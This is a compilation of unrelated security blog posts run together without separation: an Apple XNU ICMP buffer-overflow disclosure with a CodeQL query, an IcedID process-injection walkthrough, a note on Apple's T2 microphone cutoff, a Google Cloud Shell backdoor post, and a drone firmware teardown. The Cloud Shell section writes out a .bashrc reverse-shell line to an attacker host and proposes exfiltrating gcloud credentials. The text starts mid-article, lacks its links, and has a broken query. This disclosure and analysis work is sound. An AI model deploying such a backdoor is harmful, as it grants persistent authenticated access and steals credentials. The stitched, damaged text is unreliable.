  • Apple macOS Sierra, up to and including 10.12.6: all devices (patched in security update 2018-005)
  • Apple OS X El Capitan and earlier: all devices

I reported the vulnerability in time for Apple to patch the vulnerability for iOS 12 (released on September 17) and macOS Mojave (released on September 24). Both patches were announced retrospectively on October 30.

Severity and Mitigation

The vulnerability is a heap buffer overflow in the networking code in the XNU operating system kernel. XNU is used by both iOS and macOS, which is why iPhones, iPads, and Macbooks are all affected. To trigger the vulnerability, an attacker merely needs to send a malicious IP packet to the IP address of the target device. No user interaction is required. The attacker only needs to be connected to the same network as the target device. For example, if you are using the free WiFi in a coffee shop then an attacker can join the same WiFi network and send a malicious packet to your device. (If an attacker is on the same network as you, it is easy for them to discover your device’s IP address using nmap.) To make matters worse, the vulnerability is in such a fundamental part of the networking code that anti-virus software will not protect you: I tested the vulnerability on a Mac running McAfee® Endpoint Security for Mac and it made no difference. It also doesn’t matter what software you are running on the device — the malicious packet will still trigger the vulnerability even if you don’t have any ports open.

Since an attacker can control the size and content of the heap buffer overflow, it may be possible for them to exploit this vulnerability to gain remote code execution on your device. I have not attempted to write an exploit which is capable of doing this. My exploit PoC just overwrites the heap with garbage, which causes an immediate kernel crash and device reboot.

I am only aware of two mitigations against this vulnerability:

  1. Enabling stealth mode in the macOS firewall prevents the attack from working. Kudos to my colleague Henti Smith for discovering this, because this is an obscure system setting which is not enabled by default. As far as I’m aware, stealth mode does not exist on iOS devices.
  2. Do not use public WiFi networks. The attacker needs to be on the same network as the target device. It is not usually possible to send the malicious packet across the internet. For example, I wrote a fake web server which sends back a malicious reply when the target device tries to load a webpage. In my experiments, the malicious packet never arrived, except when the web server was on the same network as the target device.

Proof-of-concept exploit

I have written a proof-of-concept exploit which triggers the vulnerability. To give Apple’s users time to upgrade, I will not publish the source code for the exploit PoC immediately. However, I have made a short video which shows the PoC in action, crashing all the Apple devices on the local network.

The vulnerability

The bug is a buffer overflow in this line of code (bsd/netinet/ip_icmp.c:339):

m_copydata(n, 0, icmplen, (caddr_t)&icp->icmp_ip);

This code is in the function icmp_error. According to the comment, the purpose of this function is to «Generate an error packet of type error in response to bad packet ip». It uses the ICMP protocol to send out the error message. The header of the packet that caused the error is included in the ICMP message, so the purpose of the call to m_copydata on line 339 is to copy the header of the bad packet into the ICMP message. The problem is that the header might be too big for the destination buffer. The destination buffer is an mbufmbuf is a datatype which is used to store both incoming and outgoing network packets. In this code, n is an incoming packet (containing untrusted data) and m is an outgoing ICMP packet. As we will see shortly, icp is a pointer into mm is allocated on line 294 or line 296:

if (MHLEN > (sizeof(struct ip) + ICMP_MINLEN + icmplen))
  m = m_gethdr(M_DONTWAIT, MT_HEADER);  /* MAC-OK */
  m = m_getcl(M_DONTWAIT, MT_DATA, M_PKTHDR);

Slightly further down, on line 314mtod is used to get m‘s data pointer:

icp = mtod(m, struct icmp *);

mtod is just macro, so this line of code does not check that the mbuf is large enough to hold an icmp struct. Furthermore, the data is not copied to icp, but to &icp->icmp_ip, which is at an offset of +8 bytes from icp.

I do not have the necessary tools to be able to step through the XNU kernel in a debugger, so I am actually a little unsure about the exact allocation size of the mbuf. Based on what I see in the source code, I think that m_gethdr creates an mbuf that can hold 88 bytes, but I am less sure about m_getcl. Based on practical experiments, I have found that a buffer overflow is triggered when icmplen >= 84.

At this time, I will not say any more about how the exploit works. I want to give Apple users a chance to upgrade their devices first. However, in the relatively near future I will publish the source code for the exploit PoC in our SecurityExploits repository.

Finding the vulnerability with QL

I found this vulnerability by doing variant analysis on the bug that caused the buffer overflow vulnerability in the packet-mangler. That vulnerability was caused by a call to mbuf_copydata with a user-controlled size argument. So I wrote a simple query to look for similar bugs:

 * @name mbuf copydata with tainted size
 * @description Calling m_copydata with an untrusted size argument
 *              could cause a buffer overflow.
 * @kind path-problem
 * @problem.severity warning
 * @id apple-xnu/cpp/mbuf-copydata-with-tainted-size

import cpp
import semmle.code.cpp.dataflow.TaintTracking
import DataFlow::PathGraph

class Config extends TaintTracking::Configuration {
  Config() { this = "tcphdr_flow" }

  override predicate isSource(DataFlow::Node source) {
    source.asExpr().(FunctionCall).getTarget().getName() = "m_mtod"

  override predicate isSink(DataFlow::Node sink) {
    exists (FunctionCall call
    | call.getArgument(2) = sink.asExpr() and

from Config cfg, DataFlow::PathNode source, DataFlow::PathNode sink
where cfg.hasFlowPath(source, sink)
select sink, source, sink, "m_copydata with tainted size."

This is a simple taint-tracking query which looks for dataflow from m_mtod to the size of argument of a «copydata» function. The function named m_mtod returns the data pointer of an mbuf, so it is quite likely that it will return untrusted data. It is what the mtod macro expands to. Obviously m_mtod is just one of many sources of untrusted data in the XNU kernel, but I have not included any other sources to keep the query as simple as possible. This query returns 9 results, the first of which is the vulnerability in icmp_error. I believe the other 8 results are false positives, but the code is sufficiently complicated that I do consider them to be bad query results.

Try QL on XNU

Unlike most other open source projects, XNU is not available to query on LGTM. This is because LGTM uses Linux workers to build projects, but XNU can only be built on a Mac. Even on a Mac, XNU is highly non-trivial to build. I would not have been able to do it if I had not found this incredibly useful blog post by Jeremy Andrus. Using Jeremy Andrus’s instructions and scripts, I have manually built snapshots for the three most recent published versions of XNU. You can download the snapshots from these links: 10.13.410.13.510.13.6. Unfortunately, Apple have not yet released the source code for 10.14 (Mojave / iOS 12), so I cannot create a QL snapshot for running queries against it yet. To run queries on these QL snapshots, you will need to download QL for Eclipse. Instructions on how to use QL for Eclipse can be found here.


  • 2018-08-09: Privately disclosed to Proof-of-concept exploit included.
  • 2018-08-09: Report acknowledged by
  • 2018-08-20: asked me to send them the exact macOS version number and a panic log.
  • 2018-08-20: Returned the requested information to Also sent them a slightly improved version of the exploit PoC.
  • 2018-08-22: confirmed that the issue is fixed in the betas of macOS Mojave and iOS 12. However, they also said that they are «investigating addressing this issue on additional platforms» and that they will not disclose the issue until November 2018.
  • 2018-09-17: iOS 12 released by Apple. The vulnerability was fixed.
  • 2018-09-24: macOS Mojave released by Apple. The vulnerability was fixed.
  • 2018-10-30: Vulnerabilities disclosed.

"Send it back"


  • «I am Error». Screenshot from Zelda II: The Adventure of Link. The screenshot copyright is believed to belong to Nintendo. Image downloaded from wikipedia.
  • «Send it back». By Edward Backhouse.

Interesting technique to inject malicious code into svchost.exe

Once launched, IcedID takes advantage of an interesting technique to inject malicious code into svchost.exe — it does not require starting the target process in a suspended state, and is achieved by only using the following functions:

  • kernel32!CreateProcessA
  • ntdll!ZwAllocateVirtualMemory
  • ntdll!ZwProtectVirtualMemory
  • ntdll!ZwWriteVirtualMemory

IcedID’s code injection into svchost.exe works as follows:

  1. In the memory space of the IcedID process, the function ntdll!ZwCreateUserProcess is hooked.
  2. The function kernel32!CreateProcessA is called to launch svchost.exe and the CREATE_SUSPENDED flag is not set.
  3. The hook onntdll!ZwCreateUserProcess is hit as a result of calling kernel32!CreateProcessA. The hook is then removed, and the actual function call to ntdll!ZwCreateUserProcess is made.
  1. At this point, the malicious process is still in the hook, the svchost.exe process has been loaded into memory by the operating system, but the main thread of svchost.exe has not yet started.
  1. The call to ntdll!ZwCreateUserProcess returns the process handle for svchost.exe. Using the process handle, the functions ntdll!NtAllocateVirtualMemory and ntdll!ZwWriteVirtualMemory can be used to write malicious code to the svchost.exe memory space.
  2. In the svchost.exe memory space, the call to ntdll!RtlExitUserProcess is hooked to jump to the malicious code already written
  3. The malicious function returns, which continues the code initiated by the call tokernel32!CreateProcessA, and the main thread of svchost.exe will be scheduled to run by the operating system.
  4. The malicious process ends.

Since svchost.exe has been called with no arguments, it would normally immediately shut down because there is no service to launch. However, as part of its shutdown, it will call ntdll!RtlExitUserProcess, which hits the malicious hook, and the malicious code will take over at this point.

Apple T2 security chip on new Macbook prevents software from using the mic to eavesdrop

( Original text by BY  )

Apple MacBook is equipped with a new T2 security chip, which uses a hard-breaking design, can automatically disable the microphone when necessary – such as closing the laptop screen. It is reported that the Apple T2 security chip is bundled with the Secure Enclave security zone coprocessor, which is designed to support MacOS’s Apple File System (APFS) encrypted storage, Touch ID, secure boot and more.

In addition, the chip has a number of controllers that integrate management functions for the system, SSD, audio, and image signal processors. As described in the Apple T2 Chip Security Overview document published in October 2018:

“All Mac portables with the Apple T2 Security Chip feature a hardware disconnect that ensures that the microphone is disabled whenever the lid 
is closed.”

As a result, when the MacBook is closed, even users running with the kernel or root privileges cannot eavesdrop on users. The webcam won’t be disconnected from the hardware when the screen is closed. Apple said: “The camera is not disconnected in hardware because its field of view 
 is completely obstructed with the lid closed.” This hardware-based protection makes it extremely difficult for malicious attackers to eavesdrop.


Persistent GCP backdoors with Google’s Cloud Shell

( Original text by Juan Berner )

Cloud Shell

Google Cloud Shell provides you with command-line access to your cloud resources directly from your browser without any associated cost. This is a very neat feature which means that whoever is browsing google’s cloud platform website ( can immediately jump into performing commands using the gcloud command.

There are two ways of accessing Cloud Shell:

  1. Through the authenticated webpage (
  2. Through the gcloud command-line tool: gcloud alpha cloud-shell
How working with Cloud Shell looks like

The good

Cloud Shell is a very useful tool to transform the interaction between the command line gcloud utility and the web frontend seamless. At any point you can open a Cloud Shell view, where you will have a virtual machine at your disposal to perform any actions that you might need. This virtual machine persists while your Cloud Shell session is active and terminates after an hour of inactivity¹. Even if the session is terminated, your home directory will be maintained as long as you have activity in at least 120 days².

Also since Cloud Shell provides built-in authorization for access to projects and resources hosted on Google Cloud Platform³, that means that there is no need to perform any login operation to access any resource you might need.

As google states it:

With Cloud Shell, the Cloud SDK gcloud command-line tool and other utilities you need are always available, up to date and fully authenticated when you need them.⁴

This Cloud Shell instance is created behind the scenes whenever the user needs to access it, and deleted the same way after a period of activity. Yet this instance is not part of the compute resources of any project from the user or allowed the same kind of configurations.

To recap, we have established that:

  1. Any google user with access to google cloud has access to a fully authenticated Cloud Shell instance.
  2. Said instance will maintain its home directory for at least 120 days if no activity happens.
  3. There is no capabilities for an organisation to monitor the activity of that instance.

The ugly

There are other services in google cloud that would allow you to get a backdoor on a project, creating a cloud function, container or virtual machine would serve similar capabilities just as a rogue service account with extensive privileges. So you might be asking why the focus on this one?

The key thing here is that an organisation is completely blind to this kind of abuse. System logs from Cloud Shell are not centralised, network logs can’t be collected (you can’t select in which subnet your Cloud Shell would be created at all), you can’t list its information or visualize which Cloud Shell virtual machines are running or any of the other normal security controls you would impose in other GCP resources. The fact that you have Cloud Shell available to your users means any of them have access to an unrestricted, unmonitored instance and there is nothing short of disabling the service you could do about it.

Backdooring a Cloud Shell instance

A big limitation is that the user would need to add the backdoor themselves, this could happen through:

  • A social engineering guidance to run a particular script
  • An unlocked laptop with a google account logged in to a google project
  • Malware on an endpoint with access to the google project

To add an example backdoor, I will modify the $HOME/.bashrc file so that every time someone logs in to their Cloud Shell it would execute:

echo ‘(nohup /usr/bin/env -i /bin/bash 2>/dev/null — norc — noprofile >& /dev/tcp/’$CCSERVER’/443 0>&1 &)’ >> $HOME/.bashrc

This will ensure that every time a user logs in to their Cloud Shell instance, no matter how many times it might be destroyed, there is a background callback to your server which will give you a fully authenticated shell on that instance even after logout. That means that as times passes on and the user might change their password or expire any kind of session tokens, any permissions the user might gain will be available to the attacker as long as they don’t notice the backdoor in their home profile (and who checks those really?).

The end result is, that every time the user logs in, as long as your control server is listening, you will get a new shell to control fully authenticated as the victim.

Instance receiving a callback from a backdoored Cloud Shell and using the cloud shell users permissions.

In practice you would probably want to make the backdoor upload the $HOME/.config/gcloud/ and $HOME/.gsutil/credstore2 back to your control server. The key part here is that even if those credentials are revoked, every time the infected user opens their Cloud Shell instance a new version of those credentials would be available to the adversary.

In short, Cloud Shell is a tool that — in its current form — is best suited for personal use or organisations which are comfortable in delegating the control over the Cloud Shell environment to their individual users. Enterprises with stricter security policies might want to disable Cloud Shell for their organisation (which they can do by filing a support request), until better monitoring and auditing capabilities are available in the tool.

An option to increase its security is to harden the instance through a custom Cloud Shell environment⁵ and centralize its logs through an internet tunnel yet this will still be under the control of the user, so there is no possibility of any remote checks on the security of the instance or visibility on its network activity. If the image is compromised and the security controls on it modified, there will not be any external controls that can be placed to detect it.

Until the moment when Cloud Shell is just another compute resource running on your project and subject to the same controls as you could provide with the rest of your resources, the risk it imposes on an organisation might outweigh its rewards.


Brief reverse engineering work on FIMI A3

( Original text by Konrad Iturbe )

This is the start of a new series on reverse engineering consumer products, mainly to enhance their use but also to expose data leaks and vulnerabilities.

Something caught my eye last week. Xiaomi-backed FIMI, a Shenzhen company, released a drone. I tend to avoid most cheap drones since they tend to suck (bad quality camera, bad UX…) but this one is different.

This drone has a “DIY” port. This is an UART/PWM/GPIO port with what I assume are two ports for power. FIMI showcases how the user can attach a fireworks igniter or LEDs, but my mind went instantly to this DEF CON presentation from this year. The project is about a drone which is difficult to intercept but the author of the presentation also shows some offensive uses of drones. This drone can theoretically have a WiFi jammer or a promiscuous WiFi packet sniffer which can be activated from the ground. Possibilities are endless when you have this sort of port. The A3 also does not need a smartphone for operation, it includes a remote controller with an LCD panel. Having a smartphone controlling the drone opens a new vector for attackers (wifi network between the remote controller and cellphone can be brute forced, phone can have malware…). DJI does not yet have a all-in-one remote controller but Xiaomi has outsmarted them. Chinese innovation at its finest.

DIY port. Time to attach a RPI Zero with a pinneapple.
Some payloads that can be attached to drones. Source: David Melendez’s DEF CON talk PDF

On the camera side for those interested this drone is rocking the AMBA A12 chipset with a 1440p Sony CMOS sensor. Takes 8MP stills and can record 1080p video at 30FPS with a bitrate of 60 MB/s. The gimbal is 2 axis, just like the DJI Spark but at ~$250 this drone is a worthy competitor of the DJI Spark. If it only shot 4K video and had 3 axis gimbal, but we can’t have everything in life.

Part 1: The firmware(s):

FIMI makes the firmware available for downloading to anyone here.

The firmware is split into 3: The AMBA A12 firmware, the Drone Cortex A7 firmware and the remote controller firmware.

wget -P drone_fw/

wget -P cam_fw/

wget -P remotecontrol_fw/

The firmwares are highly compressed. The filesize of each one is:




First step is to decompress each firmware zip file. After the decompression is done the remote firmware yields a 1.2M BFU file, the drone firmware is now a 492K BIN file and the camera firmware, which contains code relevant to the AMBA ISP yields 3 files: a 3.8M firmware.bin and two 0-byte files: rollback.txt and update.txt. Looking deeper at the firmware.bin file using binwalk 3 files are compressed: amba_ssp_svc.bin, dsp.bin.gz, rom.bin.gz

amba_ssp_svc.bin is a gz file, so the name should be amba_ssp_svc.bin.gz

Using we can get the gz files and their contents:

firmware.bin SHA512: 1cba74305d0491b957f1805c84e9b1cf5674002fc4f0de26905a16fb40303376187f1c35085b7455bff5c4de23cf8faa9479e4f78fd50dbf69947deb27f5d687

From here I used dd to extract the files. The “skip” flag is the location and the count is the next location — location.

dd if=[firmware.bin] of=out/amba_ssp_svc.bin.gz bs=1 skip=508 count=1812019
dd if=[firmware.bin] of=out/dsp.bin.gz bs=1 skip=1812527 count=1988127
dd if=[firmware.bin] of=out/rom.bin.gz bs=1 skip=3800654 count=143664

NOTE: All the files needed are on my github repository.

Now there is something to work with. Extrac each file with gunzip and we end up with:

4.3M amba_ssp_svc.bin
4.9M dsp.bin
2.3M rom.bin

Part 2: Ambarella chipset:

This is as far as we get. The 4.3M file is the AMBA chipset firmware. From here we can use some of the methods I used in reverse engineering GoPro camera firmwares:

strings amba_ssp_svc.bin | grep “c:\\\\”

The aim of this reverse engineering work is to:

  • See if we can flash our own images onto the drone
  • See what kind of resolutions and frame rates are available
  • See if we can run custom commands or get a telnet/RTOS session
  • Disable NFZ (No Fly Zones) and enable FCC (US 5GHz mode) in Europe
  • Can we root the drone?

It appears we can flash images from the SD card to the drone:


As per the resolutions, see cam_fw/out/ in the GitHub repository.

The AMBA A12 chipset accepts some commands, including what appears to be RTOS USB Shell.

The drone firmware and controller firmware don’t have such ways of getting into. The drone firmware is a bin file with no sections and the remote controller firmware is a bfu file.

It’d be interesting if the drone can fly on offline waypoints. Attaching a WiFi sniffer just got a whole lot easier.

I ordered this drone but it won’t arrive soon since it’s a pre-order.

Stay tuned for part 2!

GitHub repository: